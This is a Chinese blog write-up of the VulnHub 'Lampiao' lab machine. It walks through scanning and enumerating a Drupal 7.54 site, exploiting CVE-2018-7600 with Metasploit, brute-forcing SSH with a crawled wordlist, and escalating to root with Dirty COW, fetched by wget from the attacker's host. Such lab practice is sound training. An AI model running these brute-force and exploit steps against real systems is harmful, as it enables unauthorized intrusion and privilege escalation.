vlunhub系列之lampiao靶机

已于 2023-08-09 00:17:08 修改
阅读量122 收藏
点赞数
分类专栏: 靶机 文章标签: 网络安全 linux
于 2023-08-09 00:04:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hanjinming110/article/details/132178599
版权

靶机lampiao

使用netdiscover以及arp-scan进行主机发现

arp-scan -l
netdiscover -r 192.168.12.0/24

这里进行主机发现
在这里插入图片描述

使用masscan进行端口扫描

masscan -p 0-60000 --rate=10000 192.168.12.135

这个发现开放的端口

在这里插入图片描述

使用nmap进行服务探测

nmap -sS -T5 -p 22,80,1898 192.168.12.135 对指定的端口进行扫描

在这里插入图片描述

发现开放一个http服务,我们可以使用-A参数查看详细信息

nmap -A -T5 192.168.12.135 -p 80,22,1898

这里我们发现80端口是http服务

在这里插入图片描述

1898开放的端口也是http服务,并且使用的架构是drupal

在这里插入图片描述

我们去访问一下80 以及1898端口
在这里插入图片描述

在这里插入图片描述

查看源代码

在这里插入图片描述

并没有什么可以利用的信息。
接着我们可以进行一次目录探测。

dirb http://192.168.12.135:1898
nikto -host 192.168.12.135:1898

我们在这里发现一个robots文件,这里存在着一些网页爬虫不可以爬取以及可以爬取的文件。

在这里插入图片描述

我们发现有一个文件,这里存放这一些这个服务相关的内容

在这里插入图片描述

在这里我们发现了这个服务的版本号,是drupal 7.54

在这里插入图片描述

通过搜索发现存在一个cve2018-7600远程代码执行漏洞。我们可以利用这个漏洞进行渗透

在这里插入图片描述

这里我们找到了2018年的漏洞,我们利用他进行

在这里插入图片描述

这里我们设置攻击的主机ip地址以及端口号即可,payload使用默认payload即可。

在这里插入图片描述

这里我们成功使用msf拿下
我们去shell看一下权限

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ 使用这个生成一个交互的shell

这里发现并不是root权限所以我们需要提权。

在这里插入图片描述

我们在家目录下面发现了另外一个用户

在这里插入图片描述

这里我们缺少这用户的密码,我们可以尝试着找找看

cewl http://192.168.12.135:1898 -w passwd.txt
这里我们对这个网站进行爬取,并且将爬取的内容生成一个密码字典

在这里插入图片描述

这里我们使用这个密码字典,使用tiago这个用户名对该22端口ssh服务进行爆破
我们使用hydra以及medusa

hydra -l tiago -P /root/passwd.txt 192.168.12.135 ssh
medusa -h 192.168.12.135 -u tiago -P passwd.txt -M ssh

在这里插入图片描述

在这里插入图片描述

这里成功爆破出ssh账号以及密码,我们可以使用ssh远程登录

ssh tiago@192.168.12.135
tiago@192.168.12.135’s password:Virgulino

这里我们成功的登陆

在这里插入图片描述

然而遗憾的是,这个用户并没有查看root的权限。

在这里插入图片描述

我们可以去查看一下内核版本

uname -a

在这里插入图片描述

我们可以去找一下这个版本有没有什么可以利用的漏洞,经过我们查阅资料我们发现可以使用脏牛对这个机器进行提权。(Linux为2016年7月更新,可以使用脏牛进行提权 CVE-2016-5195脏牛漏洞范围:Linux kernel>2.6.22 (2007年发行,到2016年10月18日才修复))

searchsploit dirty

在这里插入图片描述

我们使用这个cpp后缀的,使用g++进行编译。
我们可以使用find找一下他的路径

find / -name 40847.cpp

我们找到了他的路径

在这里插入图片描述

我们可以将他放到我们的网页根目录先,使用ssh进入靶机然后wget下载

cp -r /usr/share/exploitdb/exploits/linux/local/40847.cpp /var/www/html

在这里插入图片描述

我们使用wget来远程获取(这里我们选择在tmp目录下,因为tmp目录下权限所有用户都有。)

tiago@lampiao:/tmp$ wget http://192.168.12.20/40847.cpp

在这里插入图片描述

我们对其进行编译,使用g++编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o aaa 40847.cpp -lutil 在当前目录中生成一个aaa的编译文件 参数含义:
1.-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
2.-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
3.-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
4.-std=c++11就是用按C++2011标准来编译的
5.-pthread 在Linux中要用到多线程时,需要链接pthread库
6.-o aaa gcc生成的目标文件,名字为aaa

这里会生成一个aaa的文件,我们查看其权限

在这里插入图片描述

发现它就是一个可执行文件,所以我们直接执行

在这里插入图片描述

这里成功执行。

在这里插入图片描述

我们可以发现生成一个新的密码 dirtyCowFun
我们重新登陆这个用户之后直接切换root尝试一下

tiago@lampiao:~$ su - root
Password: dirtyCowFun

这里成功拿下root权限。

在这里插入图片描述

后续还会对vlunhub系列的靶机进行更新,希望对大家有所帮助!!

JM丫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Lampiao 靶机练习
SYJ_361的博客
02-28 4228
利用kali对靶机进行扫描,远程登录靶机,并对靶机进行提权,找到靶机里面的文件
T_lampiao靶机
Finch_Alan的博客
02-08 910
d
[vulnhub系列]lampiao靶机
薛定谔嘚喵博客
03-08 293
1)信息收集:1、nmap挖掘信息。2、挖掘HTTP服务信息。3、搜寻页面有用的信息。4、对信息页面枚举。5、爬取网页信息。2)暴力破解:hydra暴力破解ssh密码3)提权:1、内核提权。
vlunhub-Lampiao靶机通关(超详细)
weixin_53730939的博客
01-03 456
vlunhub-Lampiao靶机通关(超详细)
lampiao靶机渗透测试
m0_56375711的博客
12-25 1393
lampiao靶机渗透测试。包括awvs、msf、脏牛漏洞提权的练习
lampiao靶机实验实战演练
lianliandad的博客
11-24 1129
好好学习
lampiao靶机-脏牛提权
m0_63028223的博客
07-18 1312
dirb扫描出来很多敏感目录,泄露许多敏感信息。发现有很多漏洞,sql注入了,远程代码执行什么的。访问80端口没什么收获,访问1898端口。发现没有sudo提权可以使用的命令。Drupal7框架。拿到root账户密码。...
lampiao靶机渗透流程
qq_69206769的博客
03-22 480
靶机lampiao 192.168.101.59攻击机: kali 192.168.101.31。
Vulnhub-Lampiao 靶机渗透
Majula
01-30 1848
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
Lampiao靶机渗透测试
Huangshanyoumu的博客
04-19 1119
一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.1.120 发现开启了 22 ssh 服务 80、1898 web 服务,drupal7 框架 二、漏洞挖掘 1.查看对方web服务 访问 80 端口: 访问 1898 发现 drupal 框架 发现点击两个 Read more 会跳转到 ?q=node/1 和 ?q=node/3 ,没有 2,尝试访问 node2 发现有两个文件,尝试访问 发现 audio.m4a 是一段音频,内
lampiao-开源
05-03
Lampiao是一种具有两个模块的软件:代理和服务器。 代理获取硬件/软件/网络信息,并将简历发送到服务器。
HackTheBox靶机系列之困难Reel
04-09
主要介绍Reel靶机得整个利用过程
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
靶机系列测试 djinn1
08-03
介绍2.1 靶机介绍描述说明The machine is VirtualBox as well as VMWare compatible. The DHCP w
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8226
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux部署安装
凌北辰的博客
05-10 499
因为在RPM安装过程中经常需要解决依赖关系,而有些依赖关系并不会有准确的依赖安装包提示信息,YUM是RPM包管理工具,可以很好解决RPM包安装过程中会遇到的依赖关系问题。YUM安装软件时至少需要一个YUM源,YUM源就像一个存放了好多RPM包的仓库,用户可以使用ftp、http等方式访问YUM源。Linux上大部分软件都是开源软件(apache、tomcat、PHP、MySQL等)YUM可以从多个 源中搜索软件及软件安装所依赖的安装包,并自动安装相应的依赖软件。软件组安装-字符界面安装图形化。
Linux知识点笔记
最新发布
exercise_smile的博客
05-16 555
Linux 主要的发行版(release):Ubuntu(乌班图)、 RedHat(红帽)、 CentOS、 Debain[蝶变]、 Fedora、 SuSE、 OpenSUSE [示意图]在 linux 中的每个用户必须属于一个组, 不能独立于组外。在 linux 中每个文件 有所有者、 所在组、 其它组的概念。ls -l 中显示的内容如下:0-9 位说明:第 0 位确定文件类型(d, - , l , c , b)l 是链接, 相当于 windows 的快捷方式。
Linux FT260驱动内核学习笔记
pq的博客
05-12 781
系统采用Ubuntu 22,X86 64。
lampiao靶机安装
07-27
为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JM丫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值